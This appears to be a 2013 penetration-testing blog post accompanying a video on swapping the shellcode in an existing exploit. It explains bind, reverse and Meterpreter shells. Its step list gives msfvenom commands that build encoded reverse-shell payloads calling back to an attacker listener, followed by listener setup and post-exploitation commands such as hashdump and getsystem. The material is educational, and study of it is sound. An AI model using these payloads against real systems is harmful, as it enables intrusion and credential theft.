root@dafthack:~#‎ > ‎

Video: Basic Exploit Modification part 2: Changing Shellcode

posted Jan 13, 2013, 1:01 PM by Beau Bullock
In this video I am demonstrating basic shellcode modification.  I am showing three different popular types of shells: bind, reverse, and Meterpreter shells.  

I modify the original bind shell to be a reverse shell.  The original bind shell basically creates a listener on the target machine that we can connect to.  But what if there was a firewall in between us that I couldn't connect through?  This is where reverse shells come in handy.  Instead of us connecting to the target the target is connecting back to us and you can usually find a port allowed outbound through a firewall.

Luckily this exploit has plenty of space for shellcode so no modification to the padding or NOP sleds is necessary.  All that is needed to modify the shellcode is to copy it over the old shellcode.

Next, I create a Meterpreter payload and modify the shellcode accordingly.  Meterpreter shells are very useful as it provides a lot of built in post-exploitation functionality including privilege escalation, hash dumping, keylogging and screenshotting.

The music in this video was written and recorded by yours truly.




















Steps:
1. Exploit target using original script and land the bind shell.

2. Use MSFVenom to create a reverse TCP payload: 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.230.134 LPORT=4321 EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20" -i 2 

3. Copy it over the old shellcode

4. Set up a netcat listener on port 4321

5. Execute the exploit

6. Generate reverse Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.134 LPORT=4321 EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20" -i 2 

7. Copy it over the reverse TCP shellcode

8. Launch msfconsole and set up exploit/multi/handler

9. Execute the exploit again

10. Try some Meterpreter commands: sysinfo, getuid, getsystem, hashdump, screenshot
Comments